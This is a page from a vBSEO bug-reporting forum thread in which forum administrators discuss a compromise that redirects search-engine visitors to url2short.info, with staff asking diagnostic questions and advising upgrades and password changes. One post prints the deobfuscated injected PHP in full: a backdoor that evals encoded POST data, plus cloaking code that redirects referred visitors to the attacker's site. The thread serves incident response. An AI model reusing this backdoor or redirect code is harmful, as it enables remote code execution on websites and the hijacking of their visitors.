Page 4 of 21 FirstFirst 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ... LastLast
Results 46 to 60 of 309
Like Tree2Likes

Security issue

This is a discussion on Security issue within the Bug Reporting forums, part of the vBSEO SEO Plugin category; Ok so ive been hit too, running vbulletin 3.8.1 and vb seo 3.3.0 What should i be doing ? as ...

  1. #46
    Member
    Real Name
    no
    Join Date
    Mar 2007
    Posts
    47
    Liked
    0 times
    Ok so ive been hit too, running vbulletin 3.8.1 and vb seo 3.3.0

    What should i be doing ? as this re-directing is really hurting my site ?

    Should I un-install vbseo and re-install ? or just upgrade to the new version ?

    Woc

  2. #47
    Junior Member
    Real Name
    Diego
    Join Date
    Aug 2006
    Posts
    22
    Liked
    0 times
    Quote Originally Posted by usearchme View Post
    Ok so ive been hit too, running vbulletin 3.8.1 and vb seo 3.3.0

    What should i be doing ? as this re-directing is really hurting my site ?

    Should I un-install vbseo and re-install ? or just upgrade to the new version ?

    Woc
    Your vBSEO needs upgrading to 3.3.2 for sure. Follow the upgrade directions in the vBSEO ZIP file. Older versions of vBSEO are being actively exploited en-masse.

    Are you running vBSEO sitemap generator? What version?

  3. #48
    Junior Member
    Real Name
    Diego
    Join Date
    Aug 2006
    Posts
    22
    Liked
    0 times
    We have a number of forums hit by the base64 exploit already.

    Here's what we have:
    All are running current patched versions of vBSEO (3.2 or 3.3.2).
    All are running vBSEO Sitemap Generator 1.7 - 2.2. (none current)
    A variety of different vB versions vB 3.6.12 through to 3.7.6.

    I have an exported product-crawlability_vbseo.xml file that shows the base64 exploit if you need to see it. Let me know and I'll submit a ticket.

  4. #49
    Member
    Real Name
    no
    Join Date
    Mar 2007
    Posts
    47
    Liked
    0 times
    Quote Originally Posted by eksodos View Post
    Your vBSEO needs upgrading to 3.3.2 for sure. Follow the upgrade directions in the vBSEO ZIP file. Older versions of vBSEO are being actively exploited en-masse.

    Are you running vBSEO sitemap generator? What version?
    No im not running vbseo sitemap generator, should i upgrade to the latest version of vbseo as my licence runs that far ?

  5. #50
    vBSEO Staff Oleg Ignatiuk's Avatar
    Real Name
    Oleg Ignatiuk
    Join Date
    Jun 2005
    Location
    Belarus
    Posts
    25,689
    Liked
    157 times
    Hello,

    if you have server logs for the time period when that has happened, please provide details via support ticket.
    Oleg Ignatiuk / Crawlability Inc.
    vBSEO 3.6.0 GOLD Released!
    Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!


  6. #51
    Junior Member
    Real Name
    Oscar Sodani
    Join Date
    Oct 2008
    Posts
    2
    Liked
    0 times
    It's happened to us using vbSEO 3.3.2 and Site Generator 2.5. Our exploit is pointing us to url2short.info.
    Disabling and re-enabling vbseo seems to have worked for now.

  7. #52
    Junior Member
    Real Name
    Twelve-60
    Join Date
    Mar 2010
    Posts
    3
    Liked
    0 times
    For anyone interested, this is the full code it outputs (deflated, decoded, depacked, unobfuscated etc)

    Code:
    $key = md5('9h7r');
    
    if (isset($_POST[$key])) {
        eval(base64_decode(str_rot13($_POST[$key])));
    }
    
    ini_set('display_errors', 0);
    ini_set('log_errors', 0);
    
    $referer = (!empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : getenv('HTTP_REFERER'));
    
    if (strlen($referer) > 10) {
        $ip = $_SERVER['REMOTE_ADDR'];
        $hostname = @gethostbyaddr($ip);
        if ((strpos($ip, '65.55.') !== 0) && (strpos($hostname, 'msnbot') === false)) {
            $search_engines = array('search.live.com', 'www.google', 'search.yahoo.com', 'www.bing.com', 'yandex.ru', 'baidu.com');
            foreach ($search_engines as $engine) {
                if ((strpos($referer, $engine) !== false) && (empty($_COOKIE['vbsp']))) {
                    $host = substr(@md5($_SERVER['HTTP_HOST']), 0, 8);
                    die("<html>
                    <head>
                    </head>
                    <body>
                    <script type=\"text/javascript\">
                    var vbsp = '$host';
                    function ipbcc(name, value) {
                        var date = new Date();
                        date['setTime'](date['getTime']() + 86400000);
                        var expires = '; expires=' + date['toGMTString']();
                        document['cookie'] = name + '=' + value + expires + '; path=/'
                    };
                    ipbcc('vbsp', '1');
                    document['location'] = 'http://url2short.info/' + vbsp;
                    </script>
                    </body>
                    </html>");
                }
            }
        }
    }
    Essentially allowing them to execute misc code, and redirecting new members to their website :(

    - Twelve-60
    Last edited by Twelve-60; 03-10-2010 at 11:11 AM.

  8. #53
    Junior Member
    Real Name
    Diego
    Join Date
    Aug 2006
    Posts
    22
    Liked
    0 times
    Quote Originally Posted by osodani View Post
    It's happened to us using vbSEO 3.3.2 and Site Generator 2.5. Our exploit is pointing us to url2short.info.
    Disabling and re-enabling vbseo seems to have worked for now.
    Are you using any other published vBulletin add-ons or plugins? If so, can you name them?

  9. #54
    Junior Member
    Real Name
    Oscar Sodani
    Join Date
    Oct 2008
    Posts
    2
    Liked
    0 times
    Our only other plugin is Inferno vBShout Lite 2.5. We're not up to the latest vb patch level however, so we're installing that now.

  10. #55
    vBSEO.com Webmaster Mert Gökçeimam's Avatar
    Real Name
    Lizard King
    Join Date
    Oct 2005
    Location
    Istanbul, Turkey, Turkey
    Posts
    22,367
    Liked
    542 times
    Blog Entries
    4
    Does any effected person use same username + password combinations on different forums ?
    Mert Gökçeimam / Crawlability Inc.

    vBSEO 3.6.0 Alpha Önizlemesi - Including Like Tree
    Unveiling the NEW vBSEO Sitemap Generator 3.0 - available NOW for vBSEO Customers!


    Twitter:@Depkac
    Personal Blog : Mert Gökçeimam

  11. #56
    Senior Member
    Join Date
    Oct 2005
    Posts
    101
    Liked
    0 times
    Quote Originally Posted by Mert Gökçeimam View Post
    Does any effected person use same username + password combinations on different forums ?
    Nope, not here. I should note that we are running vB 3.8.4 PL2 which is the latest version in the 3.x series. We are not yet able to upgrade to 4.x.

  12. #57
    vBSEO.com Webmaster Mert Gökçeimam's Avatar
    Real Name
    Lizard King
    Join Date
    Oct 2005
    Location
    Istanbul, Turkey, Turkey
    Posts
    22,367
    Liked
    542 times
    Blog Entries
    4
    Quote Originally Posted by gcc llc View Post
    Nope, not here. I should note that we are running vB 3.8.4 PL2 which is the latest version in the 3.x series. We are not yet able to upgrade to 4.x.
    Even , no i advise everyone who is effected with this malicious attack to update every possible login information to their ftp , ssh , admincp etc. and especially your Administrator passwords.
    Mert Gökçeimam / Crawlability Inc.

    vBSEO 3.6.0 Alpha Önizlemesi - Including Like Tree
    Unveiling the NEW vBSEO Sitemap Generator 3.0 - available NOW for vBSEO Customers!


    Twitter:@Depkac
    Personal Blog : Mert Gökçeimam

  13. #58
    Senior Member
    Join Date
    Oct 2005
    Posts
    101
    Liked
    0 times
    Quote Originally Posted by Mert Gökçeimam View Post
    Even , no i advise everyone who is effected with this malicious attack to update every possible login information to their ftp , ssh , admincp etc. and especially your Administrator passwords.
    Have done that, yet the exploit still keeps happening. However, still has not happened again since I upgraded the Sitemap Generator to 2.5. Keeping my fingers crossed.

  14. #59
    vBSEO Staff Brian Cummiskey's Avatar
    Real Name
    Brian Cummiskey
    Join Date
    Jul 2009
    Location
    btwn NYC and Boston
    Posts
    12,782
    Liked
    648 times
    Blog Entries
    2
    Just to double check, check youru usergroups, specifically your admins/mods. Make sure there's no one listed who you don't know.
    Brian Cummiskey / Crawlability Inc.
    vBSEO 3.6.0 GOLD Released!
    Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!


  15. #60
    vBSEO.com Webmaster Mert Gökçeimam's Avatar
    Real Name
    Lizard King
    Join Date
    Oct 2005
    Location
    Istanbul, Turkey, Turkey
    Posts
    22,367
    Liked
    542 times
    Blog Entries
    4
    Quote Originally Posted by gcc llc View Post
    Have done that, yet the exploit still keeps happening. However, still has not happened again since I upgraded the Sitemap Generator to 2.5. Keeping my fingers crossed.
    Did your board get effected from centiyo exploit earlier ?

    Sorry we are asking too much questions but we are trying to identify what can be the cause for this exploit and since we can't find any logs we are currently hunting fish in dark waters.
    Mert Gökçeimam / Crawlability Inc.

    vBSEO 3.6.0 Alpha Önizlemesi - Including Like Tree
    Unveiling the NEW vBSEO Sitemap Generator 3.0 - available NOW for vBSEO Customers!


    Twitter:@Depkac
    Personal Blog : Mert Gökçeimam

Page 4 of 21 FirstFirst 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ... LastLast

Similar Threads

  1. Security issue with filevbseo_getsitemap.php
    By mihai11 in forum Bug Reporting
    Replies: 3
    Last Post: 11-05-2008, 03:34 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •